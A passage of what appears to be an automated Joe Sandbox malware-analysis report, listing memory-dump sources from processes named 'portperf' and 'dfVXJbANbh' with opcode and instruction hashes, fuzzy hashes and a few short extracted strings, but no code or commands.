                      • Instruction ID: 82e73c75391f81b5ce97bd0ef8a5ff4c22303a44d82bc2f0f7bfcdd11e0707ff
                      • Opcode Fuzzy Hash: b543dfa5852d478b0de6be5c2ea804c5d860a7be3157cd37d8bac8b31f5cb62e
                      • Instruction Fuzzy Hash: 0711D331E1854A8FEB99DB648CB82B97FE4FF1A301F4141BED12ADA2C6DA796441D700
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy64
                      • API String ID: 0-3698708046
                      • Opcode ID: d980d76882dc7b51ef5e1a0bea59153bcf1667c2eadce54947da928a7fcce11d
                      • Instruction ID: d4f89d2c8ccc0991347c30d9ad584dc1bf28df2e974318644cf6ab7c4a6e64e4
                      • Opcode Fuzzy Hash: d980d76882dc7b51ef5e1a0bea59153bcf1667c2eadce54947da928a7fcce11d
                      • Instruction Fuzzy Hash: 9AF0F430E1854F8AFB989B688CB82F97BE4FF0A305F00413EE42AD62C6DB786015D240
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14315601eb542b3b23131b34f1c418eaa5ff25daf45aed4ead1b9648f0863666
                      • Instruction ID: 5f9d4142b79130febe6eb2217a1f7daf37c37486110556b702abcbd3582152ac
                      • Opcode Fuzzy Hash: 14315601eb542b3b23131b34f1c418eaa5ff25daf45aed4ead1b9648f0863666
                      • Instruction Fuzzy Hash: 0551D531B08A894FDB58DE1888A55BA7BE2FFD9304B15417ED55AD3385CE78E8028781
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 601137036a071a67f65b47dac3e715089b18ce11dde210315c59ee386503b097
                      • Instruction ID: db981b179d69e472d5b8620311f3c6bb43001abdf30da0af4c2767345e0abfb8
                      • Opcode Fuzzy Hash: 601137036a071a67f65b47dac3e715089b18ce11dde210315c59ee386503b097
                      • Instruction Fuzzy Hash: 4C514B70E0850D8FEB54DBA8C8A96EDBBF1FF49300F11807AD119E7295EE786845DB10
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9058fe163ee555eccf3085dce87bafd428f7d1287fe4a36cc00fc5418e77a2df
                      • Instruction ID: 185f417be8df732ddf3ea57ec306dc438c37337754b3a658f9150dfb8e0a5cc1
                      • Opcode Fuzzy Hash: 9058fe163ee555eccf3085dce87bafd428f7d1287fe4a36cc00fc5418e77a2df
                      • Instruction Fuzzy Hash: 79417832B0C68A0FE755DB7898A61B97BE4FF87350F0680BBD11CC7196DE6CA8428351
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction ID: bf43636c4a258e68bc3790700705441accd4cef4e198aa7376d8ce138afb4eb4
                      • Opcode Fuzzy Hash: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction Fuzzy Hash: AC512630E041298EEB649B50CC917F8BAB0FF06301F1185BAD15DD6286DF7C5A86DF51
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fdb6b9668a42b6437ce3482ee08121bf3634012b5b9c520c4f79f37e43f5f51
                      • Instruction ID: 6e38988f5b36e32ca639cc80c53aac04a5fd22c260259df5b58b539f771da95f
                      • Opcode Fuzzy Hash: 5fdb6b9668a42b6437ce3482ee08121bf3634012b5b9c520c4f79f37e43f5f51
                      • Instruction Fuzzy Hash: 6831FF71A0C90A8FE794DF98E8683A87BE1EB96364F50407EC00DD36D6CFF924058B40
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4124f2ac98f3dbdbad63ccf9294ce722699239995d04b047d2e4edaa9ce25b0b
                      • Instruction ID: f75337c6ccec2b217fe4d8f6a3cf0f4ebdf7ffed3435c880edbe13468a7e7b0a
                      • Opcode Fuzzy Hash: 4124f2ac98f3dbdbad63ccf9294ce722699239995d04b047d2e4edaa9ce25b0b
                      • Instruction Fuzzy Hash: D6310670E0851D8FEB54EB98C8A4AECBBF1FF59300F15803AD119E7296DA786841DB10
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb347818d3ffecebfba703c87618e689a06165897f821238613a9957f291fd03
                      • Instruction ID: 051806f43d76370cc4e246d86366e908bdef59f4415ca8163dd7d1cce6bfd38d
                      • Opcode Fuzzy Hash: cb347818d3ffecebfba703c87618e689a06165897f821238613a9957f291fd03
                      • Instruction Fuzzy Hash: 26219A3094D68A9FE752EB748CA85EA3FF4EF07310B0545F6D058CB0A2EA7C954AC751
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b30112effb5af9980a1711b1a2e4d294fcadaa21ca25c6e5602563d590e77e4
                      • Instruction ID: c83980fcd5501a395ef1fbd652712c90555b0d3eb8128a6750af8c4d9474a96b
                      • Opcode Fuzzy Hash: 7b30112effb5af9980a1711b1a2e4d294fcadaa21ca25c6e5602563d590e77e4
                      • Instruction Fuzzy Hash: BF117C01A4E2C25FEB6397780CB54666FD44F03224B2E85FBE1E8CB1E7DA5C484AD312
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bc499bf18505941a54eeff76b36375223af1fbc7fa35675193890d8942170d1
                      • Instruction ID: 17e1166af45d916368cd0c89205948b731689b49accfd61690828b737eb7dc63
                      • Opcode Fuzzy Hash: 5bc499bf18505941a54eeff76b36375223af1fbc7fa35675193890d8942170d1
                      • Instruction Fuzzy Hash: 1A11A030E4868D8FDB99EFA488AA1B97FE0FF16300F0105BED629D2191EB79A441C700
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c7ba74975b0e03dcce9e9addd2fbc6debdc2d850b68072499e37e8125d4c6b8
                      • Instruction ID: 819b0dd781eb9ce98e4bf12c7be81f5dd90cf3151a2999f61155212d6239db1c
                      • Opcode Fuzzy Hash: 6c7ba74975b0e03dcce9e9addd2fbc6debdc2d850b68072499e37e8125d4c6b8
                      • Instruction Fuzzy Hash: 2401B530E0850E8FEB48EF64C8A56B97BA1FF59305F11447ED41ED3294CE76A551C740
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4ad5e684cce048be3bc4ce5992074dbcd0de61c07ff97713fa5759632733cc3e
                      • Instruction ID: 002d138a2a7b4ebdd3e4dfd0b5521345c12013339834ba52c562def67ccfd8d1
                      • Opcode Fuzzy Hash: 4ad5e684cce048be3bc4ce5992074dbcd0de61c07ff97713fa5759632733cc3e
                      • Instruction Fuzzy Hash: 7D018F30A4D6499FE752AB7488A96A93FE0FF0A300F0689B2D618C60A7DE7CA4459701
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 17ef7f50185517f994475833a73ae70cc68b6638e14ca53133b593868d6fe03c
                      • Instruction ID: e9aa9004e9b9c991b4560e47da184833d1762e1784d14a4b34e94575e8b2c0a5
                      • Opcode Fuzzy Hash: 17ef7f50185517f994475833a73ae70cc68b6638e14ca53133b593868d6fe03c
                      • Instruction Fuzzy Hash: B101DF30E0DA4D8FE751EB2488A91A97FE0FF1A300F0285B6D518C70A6EA79E0819700
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8a8b6451e37ff28167c45bc3a68da1b49faeb6262038df10edcdc0a6ded8ad1
                      • Instruction ID: 209f948e4da39da365b9c24f051aac28ac4ba7b3ea1413662806e8769ea36fb8
                      • Opcode Fuzzy Hash: a8a8b6451e37ff28167c45bc3a68da1b49faeb6262038df10edcdc0a6ded8ad1
                      • Instruction Fuzzy Hash: 5E01D630A0450E8BEB58EF64C5A82B977A4FF19305F51447ED41EC21D4DE7AA141C600
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 085fb7dd226ec1f89d7eeebe414d998223e6b1108b1e6fc70e9a490a0a0d5103
                      • Instruction ID: 2d260507acb8ef5745536956904fd476eaab90830cbef7f68588744d9955d2d9
                      • Opcode Fuzzy Hash: 085fb7dd226ec1f89d7eeebe414d998223e6b1108b1e6fc70e9a490a0a0d5103
                      • Instruction Fuzzy Hash: D201DC30A0850E8BEB5CEF64C8A82BA3BA4FF19304F11487EE42ED21C5DE7AA041C600
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dafc74945ba44f02d0ea5556be099a251d39ebfadb5dad10556c4d46c49785b2
                      • Instruction ID: d154bf499d2c5eb46399d58aaeef74b0e90d9eec5c3629804f5ba51b35c3a388
                      • Opcode Fuzzy Hash: dafc74945ba44f02d0ea5556be099a251d39ebfadb5dad10556c4d46c49785b2
                      • Instruction Fuzzy Hash: 4801D630A0D68D8FEB58DF248CA52BA3FA0FF16301F4544BED918C3196DB799451D741
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d981732d7347f15062af2b15b8ecc2bda8a386581f7a4fe7766d13d1531800f1
                      • Instruction ID: 0323963440605edecad4a4c0cb702bdabd6f653086e67daad87fb28c41095e85
                      • Opcode Fuzzy Hash: d981732d7347f15062af2b15b8ecc2bda8a386581f7a4fe7766d13d1531800f1
                      • Instruction Fuzzy Hash: 36F0F630A0950E8FEB54EF64C8A62FA3BA4FF06304F11447AE81DC3285DA79A451D780
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fc4ad0d8577712ae0812cdf0e824c1db4151434167e9c92a2e17436823c3c60
                      • Instruction ID: 0ebd4ee503ffe537690cbf79d1860a144bd4c82857fec5d50b939776593fa5f9
                      • Opcode Fuzzy Hash: 3fc4ad0d8577712ae0812cdf0e824c1db4151434167e9c92a2e17436823c3c60
                      • Instruction Fuzzy Hash: 0AF0F03090E3C98FEB5A9F248CB92A93FA0BF06300F4644BBD519C60D2DB7D9408C301
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 782b58f499c28e27b0b189ff7bce18c05bf6e9f35e9decfc1333e72e5eca873e
                      • Instruction ID: 7cfb0cdaee51e5bdf7e38e3304259cfcabbec629aaef9f40fff2cfe6d1a6445d
                      • Opcode Fuzzy Hash: 782b58f499c28e27b0b189ff7bce18c05bf6e9f35e9decfc1333e72e5eca873e
                      • Instruction Fuzzy Hash: F5F0F03190D28A8FEB699F2489652AA3FA4BF07300F4244BEE919C20D2DB7D9400C601
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a5091f2c3d627d64e330e59f416e397a322f2fc89bf5bc14fe0bdc417aebd79
                      • Instruction ID: beb346cc5b2ddc65eb0e358d13c85c32d194c9d4350be887df445228838c85e5
                      • Opcode Fuzzy Hash: 6a5091f2c3d627d64e330e59f416e397a322f2fc89bf5bc14fe0bdc417aebd79
                      • Instruction Fuzzy Hash: F7F03030E1A50ACBFB20DB54CCA5BBD7BB1FB55305F208275D109E3295DEB8A9858F80
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction ID: 24480e7ec079aa2ed548868011c67b361757f474b421869b49e85dd6ea636fb9
                      • Opcode Fuzzy Hash: b2a1a5cca1e6e06b9dbeb7d39b273728c7f151a8c036831ce9938b39de7d2662
                      • Instruction Fuzzy Hash: 80E06D20F098024AEB24521888D563469D19F46304FBAC275F23CC73E9EAACEC83E200
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: YR4$0YR4$@YR4$@ZR4$PZR4$`ZR4$pZR4
                      • API String ID: 0-2815790201
                      • Opcode ID: 4f4a1fc254a46c50fdb82f8541195ef5e7f55d78da9f8c00265a6fdffac978a1
                      • Instruction ID: aec24f6fa87e507cd08018ed672e7fcc1d34e5a13bfb062182e80eee3b161e8e
                      • Opcode Fuzzy Hash: 4f4a1fc254a46c50fdb82f8541195ef5e7f55d78da9f8c00265a6fdffac978a1
                      • Instruction Fuzzy Hash: 42B13A23F0E6854FD795ABA898B72FA3FE0EF43325B1901FBD148C6097D93894069381
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8m64$pGR4
                      • API String ID: 0-4022628259
                      • Opcode ID: 6b7e4e97ad19002fddf989d7e4552e5fd75697d86d58b94248e4f1432e24e8f2
                      • Instruction ID: 716ac3daa091287b705313a941d34bb4bc04491367c8fbd9c2206cd9cac668ee
                      • Opcode Fuzzy Hash: 6b7e4e97ad19002fddf989d7e4552e5fd75697d86d58b94248e4f1432e24e8f2
                      • Instruction Fuzzy Hash: 0732AF31E0864E8FEB94EB6888A96BD7BF0FF1A300F1105BAD509D3196DE79A444DB41
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ccce0deafd18c21345692991f19e578314e97baa3425b7fd8d5ebb4abe2910e2
                      • Instruction ID: 07c7969905fea443c73327c803e762361b8eae68bbe32de452f4708a9acff893
                      • Opcode Fuzzy Hash: ccce0deafd18c21345692991f19e578314e97baa3425b7fd8d5ebb4abe2910e2
                      • Instruction Fuzzy Hash: E1A2BE30E0864D8FDB95EF6888A96F97BF0FF19300F0105BAD559D3196DEB9A944CB40
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5711978e0d10eb000602b50969e3dd1dd1aba4809dc7c1b58ecfa6d97ce9d141
                      • Instruction ID: 370818b7e57d287a8afef92be9f3604cd741d98eb2e5b450276830a411058e35
                      • Opcode Fuzzy Hash: 5711978e0d10eb000602b50969e3dd1dd1aba4809dc7c1b58ecfa6d97ce9d141
                      • Instruction Fuzzy Hash: 2A62DF31A0E68A8FEB959F7488692F97FE0FF06304F0505BED948C6092DA7CA554E742
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a2cd54ef2564813a3806a675acda0e009ac9709edd40c6fc144d2c2747ae9b0b
                      • Instruction ID: 1cb406d833abf23f12cf0d82c74360f7422e7b6d969caf1199205aad86aeb6f9
                      • Opcode Fuzzy Hash: a2cd54ef2564813a3806a675acda0e009ac9709edd40c6fc144d2c2747ae9b0b
                      • Instruction Fuzzy Hash: 3542E131E0E68A8FEB95DF7488692F97BE0FF06304F0505BED948C6092DA7CA554E742
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 349c3f6962456f0a35d6344f869a202ca4e239ec616b3e48db1fc1e6e6b962fa
                      • Instruction ID: fc2e3c44c1707b4fc8639dc284b6cbf3599fb590d1da2dd0ab9887d4063fc30c
                      • Opcode Fuzzy Hash: 349c3f6962456f0a35d6344f869a202ca4e239ec616b3e48db1fc1e6e6b962fa
                      • Instruction Fuzzy Hash: 06E1A330A09A4D8FEBA8DF28C8957E977E1FB59310F04467ED84DC7295CE78E9448B81
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 121e5ddd0692024eb400503598f0e221ef5d03b326c312aabd28c369499f5ea8
                      • Instruction ID: d6372c8c3003935897e33ff11fcda888429f56c6d16f02bcec25608293e4a82d
                      • Opcode Fuzzy Hash: 121e5ddd0692024eb400503598f0e221ef5d03b326c312aabd28c369499f5ea8
                      • Instruction Fuzzy Hash: 1BE11531E0E68A8FEB959F3488692F97BE0FF06304F0505BFD948C2092DA7CA554E742
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6fc8f09a487b398852e5ac8ae1c1da4d32f05df5e43ed502fb0bb2da60e17679
                      • Instruction ID: 2cd8590f814ba3a61fb02d9a8e0a8e86a604269b1379f4a9904c8977b630c8a0
                      • Opcode Fuzzy Hash: 6fc8f09a487b398852e5ac8ae1c1da4d32f05df5e43ed502fb0bb2da60e17679
                      • Instruction Fuzzy Hash: 04D12530A0C78A9FE752EB7884A61E97FF0FF07310F0545BAC109D60BADA39A559DB41
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9e28991d3e935f011d2da6f18f84bc3b9f303991659c22462c5c8e083b4698e
                      • Instruction ID: dbd9f823e0bef10d0f4cc5096fbe6db4544b5cc4c2f8f9a40f3ce02bd8733e9a
                      • Opcode Fuzzy Hash: f9e28991d3e935f011d2da6f18f84bc3b9f303991659c22462c5c8e083b4698e
                      • Instruction Fuzzy Hash: B0B1E030E1D68A8FEB51EB6488A92FE3BF0FF0A310F0145BAD509D7196DE78A544E741
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 246b6b9003fb996980b804706781ecc4c3f7da5727e735c8d7795319c597df17
                      • Instruction ID: 7d9d78966c4173e16b6675c2bcaf17ae03442b0ef8a049098e32323071558d84
                      • Opcode Fuzzy Hash: 246b6b9003fb996980b804706781ecc4c3f7da5727e735c8d7795319c597df17
                      • Instruction Fuzzy Hash: A1B1EF30A0C68A8FDB95DF24C8A95FA3BF0FF0A300F0209BED509C7196DA79A544D781
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75ce3ee99d2d146a44c68ce69a1050d489d6a1c2a082156ef19961086ce41493
                      • Instruction ID: 263780c5659d597bfc62a6cd17273fa77f1f632ba33ce07b14b7615e35540915
                      • Opcode Fuzzy Hash: 75ce3ee99d2d146a44c68ce69a1050d489d6a1c2a082156ef19961086ce41493
                      • Instruction Fuzzy Hash: 70A1E030A0D68A8FEB9ADF6488AA2B97FE0FF16300F0501BFD549C7193CA796545E741
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0beacc5ea703308782b538a40140adb0d6de18d9906eff57a76435ff50171dc8
                      • Instruction ID: a607bd6122288925caceda5cdcc51aa01af8d1d7a0df2d31c25e89c37e2e6fbb
                      • Opcode Fuzzy Hash: 0beacc5ea703308782b538a40140adb0d6de18d9906eff57a76435ff50171dc8
                      • Instruction Fuzzy Hash: 39A17C30A0964D8FEB95EF64C8A96FE7BF0FF1A300F0105BAD409D3196DA79A944DB41
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c742d20d6774f4b727329715c8d1e958ad6a93b2be72b427ec8dbc8c9ffd5cca
                      • Instruction ID: 8c227f0fca38dd6d3737383856ee5702e70957cf95d862fc9c209afbece55a07
                      • Opcode Fuzzy Hash: c742d20d6774f4b727329715c8d1e958ad6a93b2be72b427ec8dbc8c9ffd5cca
                      • Instruction Fuzzy Hash: 6EA1A230A0E6898FDB96DF2488A91B97BF0FF16300F0509BFD51AC6192DB79E544DB01
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d6a6024de6d48b749553212728c8dac268cb12fea53cee0360ec6fc7e3c1ad4
                      • Instruction ID: 0fc9b41205f815c3a465662407af00957da9b9565e50d587d1b69f7c633549a7
                      • Opcode Fuzzy Hash: 6d6a6024de6d48b749553212728c8dac268cb12fea53cee0360ec6fc7e3c1ad4
                      • Instruction Fuzzy Hash: 2081F230A1864A8FEB99EF28C8A96FE7BF0FF16300F1105BED409C7096DAB96545D741
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2e91e26eb41688e28149c595f90271fee484a4db4f7532562c31e17eee377d5
                      • Instruction ID: 27f013f6a1e65db554a50848ee453f37b8d9de6b00ccd6ece6a0643113d9b48c
                      • Opcode Fuzzy Hash: b2e91e26eb41688e28149c595f90271fee484a4db4f7532562c31e17eee377d5
                      • Instruction Fuzzy Hash: E581AE30A0864E8FEB99EF24C8A92B97BF1FF1A300F0105BAD41AD7196DB79A544D741
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
